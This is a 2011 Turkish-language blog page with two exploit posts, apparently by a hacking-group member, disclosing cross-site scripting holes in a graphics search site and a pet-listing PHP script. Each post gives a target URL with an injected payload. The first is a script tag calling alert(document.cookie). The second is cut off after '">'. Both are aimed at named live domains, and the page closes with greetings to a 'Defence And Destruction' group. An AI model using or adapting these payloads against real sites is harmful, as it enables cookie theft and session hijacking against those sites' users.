25 Aralık 2011 Pazar

GraphicClone Cross Site Scripting

# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/

<script>ale rt(document.cookie)</script>

http://graphics.cloneforest.com/search/?term=<script>alert( document.cookie)</script>

XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
GrayHatz.co

9 Aralık 2011 Cuma

Pet Listing Cross Site Scripting

Aktiflik sıkıntısını yaşıyorum.Kendi ismim ile bazı işlere imza attım.Ondan dolayı pek boş zamanım olmuyor.Olduğu zamanda şekil a görüntü b böyle araştırıyoruz ^^

# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">



DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#